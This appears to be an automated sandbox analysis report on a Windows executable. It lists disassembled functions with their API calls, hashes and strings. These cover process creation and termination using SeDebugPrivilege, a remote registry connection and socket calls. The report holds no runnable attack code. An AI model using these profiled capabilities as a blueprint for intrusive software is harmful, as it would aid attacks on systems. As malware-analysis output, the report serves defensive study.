Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 352f2dfcba2893738c0b30324d54893f1b36d228974e920f2829b8d949bfab47
Instruction ID: f3ad44e0bcc5295e2f906732181e872f2e5d2260dd2da051834056c43baec9e0
Opcode Fuzzy Hash: 352f2dfcba2893738c0b30324d54893f1b36d228974e920f2829b8d949bfab47
Instruction Fuzzy Hash: C9417EB1501215BFEB059F50CC89FFA77AEFF09354F00801AFA0A9A251DBB0D9458BA4

Function 0067B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,006BDC00), ref: 0067B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006BDC00), ref: 0067B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0067B8C1
SysFreeString.OLEAUT32(?), ref: 0067B8EB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: c0cb889ad6a60640c9a0ef566fa4b0a77cd9e7a90dab0f714f4aadefd69d7d24
Instruction ID: 5776060695d3900c852ec3d5a440729a7fff5b27864f614b994c1f683c0d6fe0
Opcode Fuzzy Hash: c0cb889ad6a60640c9a0ef566fa4b0a77cd9e7a90dab0f714f4aadefd69d7d24
Instruction Fuzzy Hash: 8CF10875A00219EFCF04EF94C884EAEB7BAFF49315F109459F919AB250DB31AE46CB50

Function 006824D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006824F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00682688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006826AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006826EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0068270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0068286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006828A1
CloseHandle.KERNEL32(?), ref: 006828D0
CloseHandle.KERNEL32(?), ref: 00682947

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 7f3eae493641c66a2f54d74270e772a7a9e4a033240f0962a389418bb7a8081c
Instruction ID: b15eb37d0aeba58dacfc13df985e9bc0e40629d2c76dc6d3220f342ebe8ff06f
Opcode Fuzzy Hash: 7f3eae493641c66a2f54d74270e772a7a9e4a033240f0962a389418bb7a8081c
Instruction Fuzzy Hash: A6D1AF71604201DFCB54EF24C8A1A6EBBE6AF85320F14855DF9899B3A2DB30EC45CF56

Function 0068B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0068B3F4

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 040c58dc2df1d7053b8fbac5664a1ad65b789f1da043983c71e5203fbbdd1026
Instruction ID: 3e798b1264e05f652df7754abbdf9bfca5e875d7305b8502f418db0daf9802f7
Opcode Fuzzy Hash: 040c58dc2df1d7053b8fbac5664a1ad65b789f1da043983c71e5203fbbdd1026
Instruction Fuzzy Hash: 3D51A230600204BFEF34BF28CC86BAD7BA7AB06314F646215F615E66E2C771E984DB55

Function 0063A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0069DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0069DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0069DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0069DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0069DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0063A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0069DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0069DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0063A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0069DBC8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 910b09f554adbc5cc8d2871835b7cab25b8608c860ff261d1f1352c02c1645fb
Instruction ID: 68c6db9eaf148c42e875bebe62b8d3c745e0194f8b44579e1378bd15e9e991fe
Opcode Fuzzy Hash: 910b09f554adbc5cc8d2871835b7cab25b8608c860ff261d1f1352c02c1645fb
Instruction Fuzzy Hash: 71515B74600309EFDF24DF68CC91FAA77FAAB49754F100529F9869B690D770AD80EB90

Function 00667555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00665FA6,?), ref: 00666ED8

Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00665FA6,?), ref: 00666EF1

Part of subcall function 006672CB: GetFileAttributesW.KERNEL32(?,00666019), ref: 006672CC

lstrcmpiW.KERNEL32(?,?), ref: 006675CA
_wcscmp.LIBCMT ref: 006675E2
MoveFileW.KERNEL32(?,?), ref: 006675FB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 4df10ae2ceebf14dc1b06d2ad6bd7eb99cad079737a9c4a253bfa1de6ff1924d
Instruction ID: 1f4a9655b5a934afb0d7037f6625f93b212d891604ad5c1ae2bd610e8309c042
Opcode Fuzzy Hash: 4df10ae2ceebf14dc1b06d2ad6bd7eb99cad079737a9c4a253bfa1de6ff1924d
Instruction Fuzzy Hash: 6D511FB2A092299ADF94EB94D881DDE73BE9F08314F1040AEF609E3541EA74D7C5CF64

Function 0063EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0063EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0063EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0069DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0069DCF2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: b5f074e52ed5f95ac0c3addd6a4d2fb1a438fc8d898552d8837696e9be735e58
Instruction ID: d51b069c66a84c8bbd787cd5e48dd49c4f7a3acf5d95666e25432300d45e7199
Opcode Fuzzy Hash: b5f074e52ed5f95ac0c3addd6a4d2fb1a438fc8d898552d8837696e9be735e58
Instruction Fuzzy Hash: 2941D870605680DBDF3A5B288F8DABABA9FAB52304F19141DE04746AE1C772BC41D7B1

Function 0065B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0065AEF1,00000B00,?,?), ref: 0065B26C
HeapAlloc.KERNEL32(00000000,?,0065AEF1,00000B00,?,?), ref: 0065B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0065AEF1,00000B00,?,?), ref: 0065B288
GetCurrentProcess.KERNEL32(?,00000000,?,0065AEF1,00000B00,?,?), ref: 0065B290
DuplicateHandle.KERNEL32(00000000,?,0065AEF1,00000B00,?,?), ref: 0065B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0065AEF1,00000B00,?,?), ref: 0065B2A3
GetCurrentProcess.KERNEL32(0065AEF1,00000000,?,0065AEF1,00000B00,?,?), ref: 0065B2AB
DuplicateHandle.KERNEL32(00000000,?,0065AEF1,00000B00,?,?), ref: 0065B2AE
CreateThread.KERNEL32(00000000,00000000,0065B2D4,00000000,00000000,00000000), ref: 0065B2C8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: f2f64545ff0b39e9e7c8a584f29f6aae231f52343fc1a32e9536f3b35066cdae
Instruction ID: b3b882c8758f9bf40121687acb16196ed68245cc5d363feb9414ebcab35ab1e3
Opcode Fuzzy Hash: f2f64545ff0b39e9e7c8a584f29f6aae231f52343fc1a32e9536f3b35066cdae
Instruction Fuzzy Hash: 5701BBB5240304BFEB10BBA5DC49F6B7BADEB8A711F019411FA06DB5A1CA75AC00CF61

Function 0067C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0067C876, 0067C887
Not an Object type, xrefs: 0067C49E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 032cc593d13c172a0cbf5b3dd4f695543ac4c9f6a618df9582e41877bc2e05bd
Instruction ID: dac89c7f0983e1778700d015fe77cb42830d3f70e24165e50df80d59c560d7ce
Opcode Fuzzy Hash: 032cc593d13c172a0cbf5b3dd4f695543ac4c9f6a618df9582e41877bc2e05bd
Instruction Fuzzy Hash: D1E19371A00219ABDF14DFA4D891AEE77BBEF48324F14812DF909AB381D770AD45CB94

Function 006716DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

Part of subcall function 0063C6F4: _wcscpy.LIBCMT ref: 0063C717

_wcstok.LIBCMT ref: 0067184E
_wcscpy.LIBCMT ref: 006718DD
_memset.LIBCMT ref: 00671910

Strings

p2ml2m, xrefs: 00671920
X, xrefs: 00671948

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2ml2m
API String ID: 774024439-1579325628
Opcode ID: 029c53fc8b39ce23f32c93a5fc766617c7bdf32ef109001e80ea5cc90674551d
Instruction ID: d34e1d680e157e9f63eebc0b1e9347fd986ac90edcddf792c89f9d75e9364bf8
Opcode Fuzzy Hash: 029c53fc8b39ce23f32c93a5fc766617c7bdf32ef109001e80ea5cc90674551d
Instruction Fuzzy Hash: BFC191305047519FC764EF28D891A9AB7E2BF85350F00892EF9899B3A1DB30ED05CF86

Function 006286C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00627DBD

Strings

\, xrefs: 00627D89
[, xrefs: 00627E14
Q\E, xrefs: 006286D6
^, xrefs: 00627D96
], xrefs: 00627D9F
\, xrefs: 00627E1D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$\$\$]$^
API String ID: 2102423945-1026548749
Opcode ID: 78de932c79a87264b310a9088af48c10cb1da59e5da323074149df02d6cbee0a
Instruction ID: 751f428f04229c2c1abac70e070adf5b2bc4b9c472a639ba29b0d71b45d0661b
Opcode Fuzzy Hash: 78de932c79a87264b310a9088af48c10cb1da59e5da323074149df02d6cbee0a
Instruction Fuzzy Hash: 1F519B71E016299FCF24CF98D881AEDB7B7AF94304F29816AD814B7351E7309D858F91

Function 00689A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00689B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00689B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00689B47
_wcscat.LIBCMT ref: 00689BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00689BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00689BE7

Strings

SysListView32, xrefs: 00689AEB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 48732b6e4d3629b0daf715c36eb7a89576948e240c126974fa9eaad78ec7456f
Instruction ID: fd3b5513513e42d570ae27f22ce2d3061b7b877d0a39fe0674242a9adc9a1f89
Opcode Fuzzy Hash: 48732b6e4d3629b0daf715c36eb7a89576948e240c126974fa9eaad78ec7456f
Instruction Fuzzy Hash: 6641C270900308AFDB21AFA4CC85BEE77BAEF08350F14052AF549A7291D7719D85CB64

Function 0068172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00666532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00666554
Part of subcall function 00666532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00666564
Part of subcall function 00666532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006665F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0068179A
GetLastError.KERNEL32 ref: 006817AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 006817D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00681855
GetLastError.KERNEL32(00000000), ref: 00681860
CloseHandle.KERNEL32(00000000), ref: 00681895

Strings

SeDebugPrivilege, xrefs: 006817B8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d70b6a8ff1445e4e2ceadac4517d9b327c348e35e4cdaa694edf57aec03b4435
Instruction ID: 55067d04b127318b73fe1dabf699c220c2129b5f4e6a66af693de16863678120
Opcode Fuzzy Hash: d70b6a8ff1445e4e2ceadac4517d9b327c348e35e4cdaa694edf57aec03b4435
Instruction Fuzzy Hash: 4441A8B1600201AFDB45FF54C9A6FADB7ABAF45310F04905CF9069F382DB78A9068F95

Function 00665819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006658B8

Strings

question, xrefs: 00665871
info, xrefs: 00665859
stop, xrefs: 00665889
warning, xrefs: 006658A1
blank, xrefs: 0066583A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: fdcefa87bdb00a951722acf6387d377a3793cfcf7f49d4fb5d1e57ca472ec4a6
Instruction ID: 4f65e4923f490320b6789bd7ed6068fda02575438f033e39612c4b3af5ab9208
Opcode Fuzzy Hash: fdcefa87bdb00a951722acf6387d377a3793cfcf7f49d4fb5d1e57ca472ec4a6
Instruction Fuzzy Hash: 1311EB35609B72BAE7155B549C83DAA279F9F15310F30003FFA02A7781E770AA004A69

Function 0066A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0066A806

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 98c02a165b4f11cfb458f45eb33ece48a39c95c1a814a9b281e0e8bcf091cce0
Instruction ID: a68c3b2dd28f4f55aa2c473550a3b13d7b2f5809ede7a2985a773240439efa68
Opcode Fuzzy Hash: 98c02a165b4f11cfb458f45eb33ece48a39c95c1a814a9b281e0e8bcf091cce0
Instruction Fuzzy Hash: 04C15775A0421A9FDB00DFD8C481BAEB7F6EF09315F20406AE606E7341D734AA42CFA5

Function 00666B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00666B63
LoadStringW.USER32(00000000), ref: 00666B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00666B80
LoadStringW.USER32(00000000), ref: 00666B87
_wprintf.LIBCMT ref: 00666BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00666BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00666BA8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: e7b9e3f3f2c711abc952f65901267a5e20260a91d0695c5f7ec473a7509ea495
Instruction ID: 7aa42d7146fa83220af6c0e853a999843a00bbc60ca5be3bd7dc02ae407c944d
Opcode Fuzzy Hash: e7b9e3f3f2c711abc952f65901267a5e20260a91d0695c5f7ec473a7509ea495
Instruction Fuzzy Hash: 800181F2900208BFEB11BBA4DD89EF7376DDB09304F0044A1B746E6141EA74AE848F70

Function 00682B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00682BF6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: d7be4ad93ac9902b841c500b92e3c16bc809293385cfae6166d87ca30d0c45f0
Instruction ID: 568186da8834bebbac179ee5bfbe83608deb0e70ec0c8411e82ec3196ca00b42
Opcode Fuzzy Hash: d7be4ad93ac9902b841c500b92e3c16bc809293385cfae6166d87ca30d0c45f0
Instruction Fuzzy Hash: F3916A712042129FCB40EF54C8A1B6EBBE6FF88314F04895DF996972A2DB34E945CF46

Function 006795BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00679691
WSAGetLastError.WSOCK32(00000000), ref: 0067969E
__WSAFDIsSet.WSOCK32(00000000,?), ref: 006796C8
